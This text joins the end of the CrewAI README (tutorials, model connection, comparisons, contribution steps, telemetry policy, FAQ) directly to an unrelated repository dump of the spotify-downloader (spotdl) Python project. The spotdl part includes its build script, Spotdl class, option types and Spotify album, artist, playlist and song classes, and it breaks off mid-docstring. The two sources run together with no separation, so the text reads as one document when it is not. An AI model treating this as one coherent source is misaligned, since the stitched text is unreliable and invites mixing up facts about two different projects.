Quick Tutorial [![CrewAI Tutorial](https://img.youtube.com/vi/tnejrr-0a94/maxresdefault.jpg)](https://www.youtube.com/watch?v=tnejrr-0a94 "CrewAI Tutorial") ### Write Job Descriptions [Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/job-posting) or watch a video below: [![Jobs postings](https://img.youtube.com/vi/u98wEMz-9to/maxresdefault.jpg)](https://www.youtube.com/watch?v=u98wEMz-9to "Jobs postings") ### Trip Planner [Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/trip_planner) or watch a video below: [![Trip Planner](https://img.youtube.com/vi/xis7rWp-hjs/maxresdefault.jpg)](https://www.youtube.com/watch?v=xis7rWp-hjs "Trip Planner") ### Stock Analysis [Check out code for this example](https://github.com/crewAIInc/crewAI-examples/tree/main/stock_analysis) or watch a video below: [![Stock Analysis](https://img.youtube.com/vi/e0Uj4yWdaAg/maxresdefault.jpg)](https://www.youtube.com/watch?v=e0Uj4yWdaAg "Stock Analysis") ## Connecting Your Crew to a Model crewAI supports using various LLMs through a variety of connection options. By default your agents will use the OpenAI API when querying the model. However, there are several other ways to allow your agents to connect to models. For example, you can configure your agents to use a local model via the Ollama tool. Please refer to the [Connect crewAI to LLMs](https://docs.crewai.com/how-to/LLM-Connections/) page for details on configuring you agents' connections to models. ## How CrewAI Compares **CrewAI's Advantage**: CrewAI is built with production in mind. It offers the flexibility of Autogen's conversational agents and the structured process approach of ChatDev, but without the rigidity. CrewAI's processes are designed to be dynamic and adaptable, fitting seamlessly into both development and production workflows. - **Autogen**: While Autogen does good in creating conversational agents capable of working together, it lacks an inherent concept of process. In Autogen, orchestrating agents' interactions requires additional programming, which can become complex and cumbersome as the scale of tasks grows. - **ChatDev**: ChatDev introduced the idea of processes into the realm of AI agents, but its implementation is quite rigid. Customizations in ChatDev are limited and not geared towards production environments, which can hinder scalability and flexibility in real-world applications. ## Contribution CrewAI is open-source and we welcome contributions. If you're looking to contribute, please: - Fork the repository. - Create a new branch for your feature. - Add your feature or improvement. - Send a pull request. - We appreciate your input! ### Installing Dependencies ```bash poetry lock poetry install ``` ### Virtual Env ```bash poetry shell ``` ### Pre-commit hooks ```bash pre-commit install ``` ### Running Tests ```bash poetry run pytest ``` ### Running static type checks ```bash poetry run mypy ``` ### Packaging ```bash poetry build ``` ### Installing Locally ```bash pip install dist/*.tar.gz ``` ## Telemetry CrewAI uses anonymous telemetry to collect usage data with the main purpose of helping us improve the library by focusing our efforts on the most used features, integrations and tools. It's pivotal to understand that **NO data is collected** concerning prompts, task descriptions, agents' backstories or goals, usage of tools, API calls, responses, any data processed by the agents, or secrets and environment variables, with the exception of the conditions mentioned. When the `share_crew` feature is enabled, detailed data including task descriptions, agents' backstories or goals, and other specific attributes are collected to provide deeper insights while respecting user privacy. We don't offer a way to disable it now, but we will in the future. Data collected includes: - Version of crewAI - So we can understand how many users are using the latest version - Version of Python - So we can decide on what versions to better support - General OS (e.g. number of CPUs, macOS/Windows/Linux) - So we know what OS we should focus on and if we could build specific OS related features - Number of agents and tasks in a crew - So we make sure we are testing internally with similar use cases and educate people on the best practices - Crew Process being used - Understand where we should focus our efforts - If Agents are using memory or allowing delegation - Understand if we improved the features or maybe even drop them - If Tasks are being executed in parallel or sequentially - Understand if we should focus more on parallel execution - Language model being used - Improved support on most used languages - Roles of agents in a crew - Understand high level use cases so we can build better tools, integrations and examples about it - Tools names available - Understand out of the publically available tools, which ones are being used the most so we can improve them Users can opt-in to Further Telemetry, sharing the complete telemetry data by setting the `share_crew` attribute to `True` on their Crews. Enabling `share_crew` results in the collection of detailed crew and task execution data, including `goal`, `backstory`, `context`, and `output` of tasks. This enables a deeper insight into usage patterns while respecting the user's choice to share. ## License CrewAI is released under the MIT License. ## Frequently Asked Questions (FAQ) ### Q: What is CrewAI? A: CrewAI is a cutting-edge framework for orchestrating role-playing, autonomous AI agents. It enables agents to work together seamlessly, tackling complex tasks through collaborative intelligence. ### Q: How do I install CrewAI? A: You can install CrewAI using pip: ```shell pip install crewai ``` For additional tools, use: ```shell pip install 'crewai[tools]' ``` ### Q: Can I use CrewAI with local models? A: Yes, CrewAI supports various LLMs, including local models. You can configure your agents to use local models via tools like Ollama & LM Studio. Check the [LLM Connections documentation](https://docs.crewai.com/how-to/LLM-Connections/) for more details. ### Q: What are the key features of CrewAI? A: Key features include role-based agent design, autonomous inter-agent delegation, flexible task management, process-driven execution, output saving as files, and compatibility with both open-source and proprietary models. ### Q: How does CrewAI compare to other AI orchestration tools? A: CrewAI is designed with production in mind, offering flexibility similar to Autogen's conversational agents and structured processes like ChatDev, but with more adaptability for real-world applications. ### Q: Is CrewAI open-source? A: Yes, CrewAI is open-source and welcomes contributions from the community. ### Q: Does CrewAI collect any data? A: CrewAI uses anonymous telemetry to collect usage data for improvement purposes. No sensitive data (like prompts, task descriptions, or API calls) is collected. Users can opt-in to share more detailed data by setting `share_crew=True` on their Crews. ### Q: Where can I find examples of CrewAI in action? A: You can find various real-life examples in the [crewAI-examples repository](https://github.com/crewAIInc/crewAI-examples), including trip planners, stock analysis tools, and more. ### Q: How can I contribute to CrewAI? A: Contributions are welcome! You can fork the repository, create a new branch for your feature, add your improvement, and send a pull request. Check the Contribution section in the README for more details.
spotify-downloader
866daddc9fdc7f764b89e8278426fcbb2af6b03e
File: scripts/build.py import os import sys from pathlib import Path import PyInstaller.__main__ # type: ignore import pykakasi import yt_dlp import ytmusicapi from spotdl._version import __version__ LOCALES_PATH = str((Path(ytmusicapi.__file__).parent / "locales")) PYKAKASI_PATH = str((Path(pykakasi.__file__).parent / "data")) YTDLP_PATH = str(Path(yt_dlp.__file__).parent / "__pyinstaller") PyInstaller.__main__.run( [ "spotdl/__main__.py", "--onefile", "--add-data", f"{LOCALES_PATH}{os.pathsep}ytmusicapi/locales", "--add-data", f"{PYKAKASI_PATH}{os.pathsep}pykakasi/data", f"--additional-hooks-dir={YTDLP_PATH}", "--name", f"spotdl-{__version__}-{sys.platform}", "--console", ] ) File: scripts/docs/gen_ref_nav.py """Generate the code reference pages and navigation.""" from pathlib import Path import mkdocs_gen_files nav = mkdocs_gen_files.Nav() # type: ignore IGNORE = ( ("_version",), # ('__init__',) ) for path in Path("spotdl").glob("**/*.py"): module_path = path.relative_to("spotdl").with_suffix("") doc_path = path.relative_to("spotdl").with_suffix(".md") full_doc_path = Path("reference", doc_path) if module_path.parts in IGNORE: continue parts = tuple(module_path.parts) if parts[-1] == "__init__": if len(parts) != 1: parts = parts[:-1] doc_path = doc_path.with_name("index.md") full_doc_path = full_doc_path.with_name("index.md") elif parts[-1] == "__main__": continue nav[parts] = doc_path.as_posix() with mkdocs_gen_files.open(full_doc_path, "w") as fd: if parts == ("__init__",): fd.write("::: spotdl") continue IDENT = "spotdl." + ".".join(parts) fd.write(f"::: {IDENT}") mkdocs_gen_files.set_edit_path(full_doc_path, path) with mkdocs_gen_files.open("reference/SUMMARY.md", "w") as nav_file: nav_file.writelines(nav.build_literate_nav()) File: spotdl/_version.py """ Version module for spotdl. """ __version__ = "4.2.8" File: spotdl/__init__.py """ Init module for spotdl. This module contains the main entry point for spotdl. And Spotdl class """ import asyncio import concurrent.futures import logging from pathlib import Path from typing import List, Optional, Tuple, Union from spotdl._version import __version__ from spotdl.console import console_entry_point from spotdl.download.downloader import Downloader from spotdl.types.options import DownloaderOptionalOptions, DownloaderOptions from spotdl.types.song import Song from spotdl.utils.search import parse_query from spotdl.utils.spotify import SpotifyClient __all__ = ["Spotdl", "console_entry_point", "__version__"] logger = logging.getLogger(__name__) class Spotdl: """ Spotdl class, which simplifies the process of downloading songs from Spotify. ```python from spotdl import Spotdl spotdl = Spotdl(client_id='your-client-id', client_secret='your-client-secret') songs = spotdl.search(['joji - test drive', 'https://open.spotify.com/track/4cOdK2wGLETKBW3PvgPWqT']) results = spotdl.download_songs(songs) song, path = spotdl.download(songs[0]) ``` """ def __init__( self, client_id: str, client_secret: str, user_auth: bool = False, cache_path: Optional[str] = None, no_cache: bool = False, headless: bool = False, downloader_settings: Optional[ Union[DownloaderOptionalOptions, DownloaderOptions] ] = None, loop: Optional[asyncio.AbstractEventLoop] = None, ): """ Initialize the Spotdl class ### Arguments - client_id: Spotify client id - client_secret: Spotify client secret - user_auth: If true, user will be prompted to authenticate - cache_path: Path to cache directory - no_cache: If true, no cache will be used - headless: If true, no browser will be opened - downloader_settings: Settings for the downloader - loop: Event loop to use """ if downloader_settings is None: downloader_settings = {} # Initialize spotify client SpotifyClient.init( client_id=client_id, client_secret=client_secret, user_auth=user_auth, cache_path=cache_path, no_cache=no_cache, headless=headless, ) # Initialize downloader self.downloader = Downloader( settings=downloader_settings, loop=loop, ) def search(self, query: List[str]) -> List[Song]: """ Search for songs. ### Arguments - query: List of search queries ### Returns - A list of Song objects ### Notes - query can be a list of song titles, urls, uris """ return parse_query( query=query, threads=self.downloader.settings["threads"], use_ytm_data=self.downloader.settings["ytm_data"], playlist_numbering=self.downloader.settings["playlist_numbering"], album_type=self.downloader.settings["album_type"], ) def get_download_urls(self, songs: List[Song]) -> List[Optional[str]]: """ Get the download urls for a list of songs. ### Arguments - songs: List of Song objects ### Returns - A list of urls if successful. ### Notes - This function is multi-threaded. """ urls: List[Optional[str]] = [] with concurrent.futures.ThreadPoolExecutor( max_workers=self.downloader.settings["threads"] ) as executor: future_to_song = { executor.submit(self.downloader.search, song): song for song in songs } for future in concurrent.futures.as_completed(future_to_song): song = future_to_song[future] try: data = future.result() urls.append(data) except Exception as exc: logger.error("%s generated an exception: %s", song, exc) return urls def download(self, song: Song) -> Tuple[Song, Optional[Path]]: """ Download and convert song to the output format. ### Arguments - song: Song object ### Returns - A tuple containing the song and the path to the downloaded file if successful. """ return self.downloader.download_song(song) def download_songs(self, songs: List[Song]) -> List[Tuple[Song, Optional[Path]]]: """ Download and convert songs to the output format. ### Arguments - songs: List of Song objects ### Returns - A list of tuples containing the song and the path to the downloaded file if successful. """ return self.downloader.download_multiple_songs(songs) File: spotdl/__main__.py """ Main module for spotdl. Exports version and main function. """ from spotdl._version import __version__ from spotdl.console import console_entry_point if __name__ == "__main__": console_entry_point() File: spotdl/types/options.py """ This file contains types for spotdl/downloader/web modules. Options types have all the fields marked as required. Settings types have all the fields marked as optional. """ from typing import List, Optional, Union from typing_extensions import TypedDict __all__ = [ "SpotifyOptions", "DownloaderOptions", "WebOptions", "SpotDLOptions", "SpotifyOptionalOptions", "DownloaderOptionalOptions", "WebOptionalOptions", "SpotDLOptionalOptions", ] class SpotifyOptions(TypedDict): """ Options used for initializing the Spotify client. """ client_id: str client_secret: str auth_token: Optional[str] user_auth: bool headless: bool cache_path: str no_cache: bool max_retries: int use_cache_file: bool class DownloaderOptions(TypedDict): """ Options used for initializing the Downloader. """ audio_providers: List[str] lyrics_providers: List[str] genius_token: str playlist_numbering: bool scan_for_songs: bool m3u: Optional[str] output: str overwrite: str search_query: Optional[str] ffmpeg: str bitrate: Optional[Union[str, int]] ffmpeg_args: Optional[str] format: str save_file: Optional[str] filter_results: bool album_type: Optional[str] threads: int cookie_file: Optional[str] restrict: Optional[str] print_errors: bool sponsor_block: bool preload: bool archive: Optional[str] load_config: bool log_level: str simple_tui: bool fetch_albums: bool id3_separator: str ytm_data: bool add_unavailable: bool generate_lrc: bool force_update_metadata: bool only_verified_results: bool sync_without_deleting: bool max_filename_length: Optional[int] yt_dlp_args: Optional[str] detect_formats: Optional[List[str]] save_errors: Optional[str] ignore_albums: Optional[List[str]] proxy: Optional[str] skip_explicit: Optional[bool] log_format: Optional[str] redownload: Optional[bool] skip_album_art: Optional[bool] create_skip_file: Optional[bool] respect_skip_file: Optional[bool] sync_remove_lrc: Optional[bool] class WebOptions(TypedDict): """ Options used for initializing the Web server. """ web_use_output_dir: bool port: int host: str keep_alive: bool enable_tls: bool key_file: Optional[str] cert_file: Optional[str] ca_file: Optional[str] allowed_origins: Optional[List[str]] keep_sessions: bool force_update_gui: bool web_gui_repo: Optional[str] web_gui_location: Optional[str] class SpotDLOptions(SpotifyOptions, DownloaderOptions, WebOptions): """ Options used for initializing the SpotDL client. """ class SpotifyOptionalOptions(TypedDict, total=False): """ Options used for initializing the Spotify client. """ client_id: str client_secret: str auth_token: Optional[str] user_auth: bool headless: bool cache_path: str no_cache: bool max_retries: int use_cache_file: bool class DownloaderOptionalOptions(TypedDict, total=False): """ Options used for initializing the Downloader. """ audio_providers: List[str] lyrics_providers: List[str] genius_token: str playlist_numbering: bool scan_for_songs: bool m3u: Optional[str] output: str overwrite: str search_query: Optional[str] ffmpeg: str bitrate: Optional[Union[str, int]] ffmpeg_args: Optional[str] format: str save_file: Optional[str] filter_results: bool album_type: Optional[str] threads: int cookie_file: Optional[str] restrict: Optional[str] print_errors: bool sponsor_block: bool preload: bool archive: Optional[str] load_config: bool log_level: str simple_tui: bool fetch_albums: bool id3_separator: str ytm_data: bool add_unavailable: bool generate_lrc: bool force_update_metadata: bool only_verified_results: bool sync_without_deleting: bool max_filename_length: Optional[int] yt_dlp_args: Optional[str] detect_formats: Optional[List[str]] save_errors: Optional[str] proxy: Optional[str] skip_explicit: Optional[bool] log_format: Optional[str] redownload: Optional[bool] skip_album_art: Optional[bool] create_skip_file: Optional[bool] respect_skip_file: Optional[bool] sync_remove_lrc: Optional[bool] class WebOptionalOptions(TypedDict, total=False): """ Options used for initializing the Web server. """ web_use_output_dir: bool port: int host: str keep_alive: bool enable_tls: bool key_file: Optional[str] cert_file: Optional[str] ca_file: Optional[str] allowed_origins: Optional[str] keep_sessions: bool force_update_gui: bool web_gui_repo: Optional[str] web_gui_location: Optional[str] class SpotDLOptionalOptions( SpotifyOptionalOptions, DownloaderOptionalOptions, WebOptionalOptions ): """ Options used for initializing the SpotDL client. This type is modified to not require all the fields. """ File: spotdl/types/__init__.py """ Types for the spotdl package. """ File: spotdl/types/album.py """ Artist module for retrieving artist data from Spotify. """ from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Album", "AlbumError"] class AlbumError(Exception): """ Base class for all exceptions related to albums. """ @dataclass(frozen=True) class Album(SongList): """ Album class for retrieving album data from Spotify. """ artist: Dict[str, Any] @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for album. ### Arguments - url: The URL of the album. ### Returns - A dictionary with metadata. """ spotify_client = SpotifyClient() album_metadata = spotify_client.album(url) if album_metadata is None: raise AlbumError( "Couldn't get metadata, check if you have passed correct album id" ) metadata = { "name": album_metadata["name"], "artist": album_metadata["artists"][0], "url": url, } album_response = spotify_client.album_tracks(url) if album_response is None: raise AlbumError( "Couldn't get metadata, check if you have passed correct album id" ) tracks = album_response["items"] # Get all tracks from album while album_response["next"]: album_response = spotify_client.next(album_response) # Failed to get response, break the loop if album_response is None: break tracks.extend(album_response["items"]) if album_response is None: raise AlbumError(f"Failed to get album response: {url}") songs = [] for track in tracks: if not isinstance(track, dict) or track.get("is_local"): continue release_date = album_metadata["release_date"] artists = artists = [artist["name"] for artist in track["artists"]] song = Song.from_missing_data( name=track["name"], artists=artists, artist=artists[0], album_id=album_metadata["id"], album_name=album_metadata["name"], album_artist=album_metadata["artists"][0]["name"], album_type=album_metadata["album_type"], disc_number=track["disc_number"], disc_count=int(album_metadata["tracks"]["items"][-1]["disc_number"]), duration=int(track["duration_ms"] / 1000), year=release_date[:4], date=release_date, track_number=track["track_number"], tracks_count=album_metadata["total_tracks"], song_id=track["id"], explicit=track["explicit"], publisher=album_metadata["label"], url=track["external_urls"]["spotify"], cover_url=( max( album_metadata["images"], key=lambda i: i["width"] * i["height"] )["url"] if album_metadata["images"] else None ), copyright_text=( album_metadata["copyrights"][0]["text"] if album_metadata["copyrights"] else None ), ) songs.append(song) return metadata, songs File: spotdl/types/artist.py """ Artist module for retrieving artist data from Spotify. """ from dataclasses import dataclass from typing import Any, Dict, List, Set, Tuple from spotdl.types.album import Album from spotdl.types.song import Song, SongList from spotdl.utils.formatter import slugify from spotdl.utils.spotify import SpotifyClient __all__ = ["Artist", "ArtistError"] class ArtistError(Exception): """ Base class for all exceptions related to artists. """ @dataclass(frozen=True) class Artist(SongList): """ Artist class. Contains all the information about an artist. Frozen to prevent accidental modification. """ genres: List[str] albums: List[Album] @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for artist. ### Arguments - url: The URL of the artist. ### Returns - Dict with metadata for artist. """ # query spotify for artist details spotify_client = SpotifyClient() # get artist info raw_artist_meta = spotify_client.artist(url) if raw_artist_meta is None: raise ArtistError( "Couldn't get metadata, check if you have passed correct artist id" ) artist_albums = spotify_client.artist_albums(url, album_type="album,single") # check if there is response if not artist_albums: raise ArtistError( "Couldn't get albums, check if you have passed correct artist id" ) # get artist albums and remove duplicates # duplicates can occur if the artist has the same album available in # different countries albums: List[str] = [] known_albums: Set[str] = set() for album in artist_albums["items"]: albums.append(album["external_urls"]["spotify"]) known_albums.add(slugify(album["name"])) # Fetch all artist albums while artist_albums and artist_albums["next"]: artist_albums = spotify_client.next(artist_albums) if artist_albums is None: break for album in artist_albums["items"]: album_name = slugify(album["name"]) if album_name not in known_albums: albums.append(album["external_urls"]["spotify"]) known_albums.add(album_name) songs = [] for album in albums: album_obj = Album.from_url(album, fetch_songs=False) songs.extend(album_obj.songs) # Very aggressive deduplication songs_list = [] songs_names = set() for song in songs: slug_name = slugify(song.name) if song.name not in songs_names: songs_list.append(song) songs_names.add(slug_name) metadata = { "name": raw_artist_meta["name"], "genres": raw_artist_meta["genres"], "url": url, "albums": albums, } return metadata, songs_list File: spotdl/types/result.py """ Result is a class that contains all the information about a result from search performed by audio provider. """ import json from dataclasses import asdict, dataclass from typing import Any, Dict, Optional, Tuple __all__ = ["Result"] @dataclass(frozen=True, eq=True) class Result: """ Result is a class that contains all the information about a result from search perfoermed by audio provider. """ # Required fields source: str # Source of the result url: str # URL of the result verified: bool # Whether the result is from a verified source or not name: str # Name of the result duration: float # Duration of the result in seconds author: str # Author of the result result_id: str # ID of the result # Search related fields isrc_search: Optional[bool] = ( None # Whether the result is from an ISRC search or not ) search_query: Optional[str] = None # The search query used to find the result # Optional fields artists: Optional[Tuple[str, ...]] = None views: Optional[int] = None explicit: Optional[bool] = None album: Optional[str] = None year: Optional[int] = None track_number: Optional[int] = None genre: Optional[str] = None lyrics: Optional[str] = None @classmethod def from_data_dump(cls, data: str) -> "Result": """ Create a Result object from a data dump. ### Arguments - data: The data dump. ### Returns - The Song object. """ # Create dict from json string data_dict = json.loads(data) # Return product object return cls(**data_dict) @classmethod def from_dict(cls, data: Dict[str, Any]) -> "Result": """ Create a Song object from a dictionary. ### Arguments - data: The dictionary. ### Returns - The Song object. """ # Return product object return cls(**data) @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song's data. ### Returns - The dictionary. """ return asdict(self) File: spotdl/types/playlist.py """ Playlist module for retrieving playlist data from Spotify. """ import logging from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Playlist", "PlaylistError"] logger = logging.getLogger(__name__) class PlaylistError(Exception): """ Base class for all exceptions related to playlists. """ @dataclass(frozen=True) class Playlist(SongList): """ Playlist class for retrieving playlist data from Spotify. """ description: str author_url: str author_name: str cover_url: str @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for a playlist. ### Arguments - url: The URL of the playlist. ### Returns - A dictionary with metadata. """ spotify_client = SpotifyClient() playlist = spotify_client.playlist(url) if playlist is None: raise PlaylistError("Invalid playlist URL.") metadata = { "name": playlist["name"], "url": url, "description": playlist["description"], "author_url": playlist["external_urls"]["spotify"], "author_name": playlist["owner"]["display_name"], "cover_url": ( max( playlist["images"], key=lambda i: ( 0 if i["width"] is None or i["height"] is None else i["width"] * i["height"] ), )["url"] if (playlist.get("images") is not None and len(playlist["images"]) > 0) else "" ), } playlist_response = spotify_client.playlist_items(url) if playlist_response is None: raise PlaylistError(f"Wrong playlist id: {url}") # Get all tracks from playlist tracks = playlist_response["items"] while playlist_response["next"]: playlist_response = spotify_client.next(playlist_response) # Failed to get response, break the loop if playlist_response is None: break # Add tracks to the list tracks.extend(playlist_response["items"]) songs = [] for track_no, track in enumerate(tracks): if not isinstance(track, dict) or track.get("track") is None: continue track_meta = track["track"] if track_meta.get("is_local") or track_meta.get("type") != "track": logger.warning( "Skipping track: %s local tracks and %s are not supported", track_meta.get("id"), track_meta.get("type"), ) continue track_id = track_meta.get("id") if track_id is None or track_meta.get("duration_ms") == 0: continue album_meta = track_meta.get("album", {}) release_date = album_meta.get("release_date") artists = [artist["name"] for artist in track_meta.get("artists", [])] song = Song.from_missing_data( name=track_meta["name"], artists=artists, artist=artists[0], album_id=album_meta.get("id"), album_name=album_meta.get("name"), album_artist=( album_meta.get("artists", [])[0]["name"] if album_meta.get("artists") else None ), album_type=album_meta.get("album_type"), disc_number=track_meta["disc_number"], duration=int(track_meta["duration_ms"] / 1000), year=release_date[:4] if release_date else None, date=release_date, track_number=track_meta["track_number"], tracks_count=album_meta.get("total_tracks"), song_id=track_meta["id"], explicit=track_meta["explicit"], url=track_meta["external_urls"]["spotify"], isrc=track_meta.get("external_ids", {}).get("isrc"), cover_url=( max(album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if (len(album_meta.get("images", [])) > 0) else None ), list_position=track_no + 1, ) songs.append(song) return metadata, songs File: spotdl/types/saved.py """ Saved module for handing the saved tracks from user library """ from dataclasses import dataclass from typing import Any, Dict, List, Tuple from spotdl.types.song import Song, SongList from spotdl.utils.spotify import SpotifyClient __all__ = ["Saved", "SavedError"] class SavedError(Exception): """ Base class for all exceptions related to saved tracks. """ @dataclass(frozen=True) class Saved(SongList): """ Saved class for handling the saved tracks from user library. """ @staticmethod def get_metadata(url: str = "saved") -> Tuple[Dict[str, Any], List[Song]]: """ Returns metadata for a saved list. ### Arguments - url: Not required, but used to match the signature of the other get_metadata methods. ### Returns - metadata: A dictionary containing the metadata for the saved list. - songs: A list of Song objects. """ metadata = {"name": "Saved tracks", "url": url} spotify_client = SpotifyClient() if spotify_client.user_auth is False: # type: ignore raise SavedError("You must be logged in to use this function") saved_tracks_response = spotify_client.current_user_saved_tracks() if saved_tracks_response is None: raise SavedError("Couldn't get saved tracks") saved_tracks = saved_tracks_response["items"] # Fetch all saved tracks while saved_tracks_response and saved_tracks_response["next"]: response = spotify_client.next(saved_tracks_response) if response is None: break saved_tracks_response = response saved_tracks.extend(saved_tracks_response["items"]) songs = [] for track in saved_tracks: if not isinstance(track, dict) or track.get("track", {}).get("is_local"): continue track_meta = track["track"] album_meta = track_meta["album"] release_date = album_meta["release_date"] artists = artists = [artist["name"] for artist in track_meta["artists"]] song = Song.from_missing_data( name=track_meta["name"], artists=artists, artist=artists[0], album_id=album_meta["id"], album_name=album_meta["name"], album_artist=album_meta["artists"][0]["name"], album_type=album_meta["album_type"], disc_number=track_meta["disc_number"], duration=int(track_meta["duration_ms"] / 1000), year=release_date[:4], date=release_date, track_number=track_meta["track_number"], tracks_count=album_meta["total_tracks"], song_id=track_meta["id"], explicit=track_meta["explicit"], url=track_meta["external_urls"]["spotify"], isrc=track_meta.get("external_ids", {}).get("isrc"), cover_url=( max(album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if album_meta["images"] else None ), ) songs.append(song) return metadata, songs File: spotdl/types/song.py """ Song module that hold the Song and SongList classes. """ import json from dataclasses import asdict, dataclass from typing import Any, Dict, List, Optional, Tuple from rapidfuzz import fuzz from spotdl.utils.spotify import SpotifyClient __all__ = ["Song", "SongList", "SongError"] class SongError(Exception): """ Base class for all exceptions related to songs. """ class SongListError(Exception): """ Base class for all exceptions related to song lists. """ @dataclass class Song: """ Song class. Contains all the information about a song. """ name: str artists: List[str] artist: str genres: List[str] disc_number: int disc_count: int album_name: str album_artist: str album_type: str duration: int year: int date: str track_number: int tracks_count: int song_id: str explicit: bool publisher: str url: str isrc: Optional[str] cover_url: Optional[str] copyright_text: Optional[str] download_url: Optional[str] = None lyrics: Optional[str] = None popularity: Optional[int] = None album_id: Optional[str] = None list_name: Optional[str] = None list_url: Optional[str] = None list_position: Optional[int] = None list_length: Optional[int] = None artist_id: Optional[str] = None @classmethod def from_url(cls, url: str) -> "Song": """ Creates a Song object from a URL. ### Arguments - url: The URL of the song. ### Returns - The Song object. """ if "open.spotify.com" not in url or "track" not in url: raise SongError(f"Invalid URL: {url}") # query spotify for song, artist, album details spotify_client = SpotifyClient() # get track info raw_track_meta = spotify_client.track(url) if raw_track_meta is None: raise SongError( "Couldn't get metadata, check if you have passed correct track id" ) if raw_track_meta["duration_ms"] == 0 or raw_track_meta["name"].strip() == "": raise SongError(f"Track no longer exists: {url}") # get artist info primary_artist_id = raw_track_meta["artists"][0]["id"] raw_artist_meta: Dict[str, Any] = spotify_client.artist(primary_artist_id) # type: ignore # get album info album_id = raw_track_meta["album"]["id"] raw_album_meta: Dict[str, Any] = spotify_client.album(album_id) # type: ignore # create song object return cls( name=raw_track_meta["name"], artists=[artist["name"] for artist in raw_track_meta["artists"]], artist=raw_track_meta["artists"][0]["name"], artist_id=primary_artist_id, album_id=album_id, album_name=raw_album_meta["name"], album_artist=raw_album_meta["artists"][0]["name"], album_type=raw_album_meta["album_type"], copyright_text=( raw_album_meta["copyrights"][0]["text"] if raw_album_meta["copyrights"] else None ), genres=raw_album_meta["genres"] + raw_artist_meta["genres"], disc_number=raw_track_meta["disc_number"], disc_count=int(raw_album_meta["tracks"]["items"][-1]["disc_number"]), duration=int(raw_track_meta["duration_ms"] / 1000), year=int(raw_album_meta["release_date"][:4]), date=raw_album_meta["release_date"], track_number=raw_track_meta["track_number"], tracks_count=raw_album_meta["total_tracks"], isrc=raw_track_meta.get("external_ids", {}).get("isrc"), song_id=raw_track_meta["id"], explicit=raw_track_meta["explicit"], publisher=raw_album_meta["label"], url=raw_track_meta["external_urls"]["spotify"], popularity=raw_track_meta["popularity"], cover_url=( max(raw_album_meta["images"], key=lambda i: i["width"] * i["height"])[ "url" ] if raw_album_meta["images"] else None ), ) @staticmethod def search(search_term: str): """ Searches for Songs from a search term. ### Arguments - search_term: The search term to use. ### Returns - The raw search results """ spotify_client = SpotifyClient() raw_search_results = spotify_client.search(search_term) if raw_search_results is None: raise SongError(f"Spotipy error, no response: {search_term}") return raw_search_results @classmethod def from_search_term(cls, search_term: str) -> "Song": """ Creates a list of Song objects from a search term. ### Arguments - search_term: The search term to use. ### Returns - The Song object. """ raw_search_results = Song.search(search_term) if len(raw_search_results["tracks"]["items"]) == 0: raise SongError(f"No results found for: {search_term}") return Song.from_url( "http://open.spotify.com/track/" + raw_search_results["tracks"]["items"][0]["id"] ) @classmethod def list_from_search_term(cls, search_term: str) -> "List[Song]": """ Creates a list of Song objects from a search term. ### Arguments - search_term: The search term to use. ### Returns - The list of Song objects. """ raw_search_results = Song.search(search_term) songs = [] for idx, _ in enumerate(raw_search_results.get("tracks", []).get("items", [])): songs.append( Song.from_url( "http://open.spotify.com/track/" + raw_search_results["tracks"]["items"][idx]["id"] ) ) return songs @classmethod def from_data_dump(cls, data: str) -> "Song": """ Create a Song object from a data dump. ### Arguments - data: The data dump. ### Returns - The Song object. """ # Create dict from json string data_dict = json.loads(data) # Return product object return cls(**data_dict) @classmethod def from_dict(cls, data: Dict[str, Any]) -> "Song": """ Create a Song object from a dictionary. ### Arguments - data: The dictionary. ### Returns - The Song object. """ # Return product object return cls(**data) @classmethod def from_missing_data(cls, **kwargs) -> "Song": """ Create a Song object from a dictionary with missing data. For example, data dict doesn't contain all the required attributes for the Song class. ### Arguments - data: The dictionary. ### Returns - The Song object. """ song_data: Dict[str, Any] = {} for key in cls.__dataclass_fields__: # pylint: disable=E1101 song_data.setdefault(key, kwargs.get(key)) return cls(**song_data) @property def display_name(self) -> str: """ Returns a display name for the song. ### Returns - The display name. """ return f"{self.artist} - {self.name}" @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song's data. ### Returns - The dictionary. """ return asdict(self) @dataclass(frozen=True) class SongList: """ SongList class. Base class for all other song lists subclasses. """ name: str url: str urls: List[str] songs: List[Song] @classmethod def from_url(cls, url: str, fetch_songs: bool = True): """ Create a SongList object from a url. ### Arguments - url: The url of the list. - fetch_songs: Whether to fetch missing metadata for songs. ### Returns - The SongList object. """ metadata, songs = cls.get_metadata(url) urls = [song.url for song in songs] if fetch_songs: songs = [Song.from_url(song.url) for song in songs] return cls(**metadata, urls=urls, songs=songs) @classmethod def from_search_term(cls, search_term: str, fetch_songs: bool = True): """ Creates a SongList object from a search term. ### Arguments - search_term: The search term to use. ### Returns - The SongList object. """ list_type = cls.__name__.lower() spotify_client = SpotifyClient() raw_search_results = spotify_client.search(search_term, type=list_type) if ( raw_search_results is None or len(raw_search_results.get(f"{list_type}s", {}).get("items", [])) == 0 ): raise SongListError( f"No {list_type} matches found on spotify for '{search_term}'" ) matches = {} for result in raw_search_results[f"{list_type}s"]["items"]: score = fuzz.ratio(search_term.split(":", 1)[1].strip(), result["name"]) matches[result["id"]] = score best_match = max(matches, key=matches.get) # type: ignore return cls.from_url( f"http://open.spotify.com/{list_type}/{best_match}", fetch_songs, ) @property def length(self) -> int: """ Get list length (number of songs). ### Returns - The list length. """ return max(len(self.urls), len(self.songs)) @property def json(self) -> Dict[str, Any]: """ Returns a dictionary of the song list's data. ### Returns - The dictionary. """ return asdict(self) @staticmethod def get_metadata(url: str) -> Tuple[Dict[str, Any], List[Song]]: """ Get metadata for a song list. ### Arguments - url: The url of the song list. ### Returns - The metadata. """ raise NotImplementedError File: spotdl/providers/__init__.py """ Different types of data providers 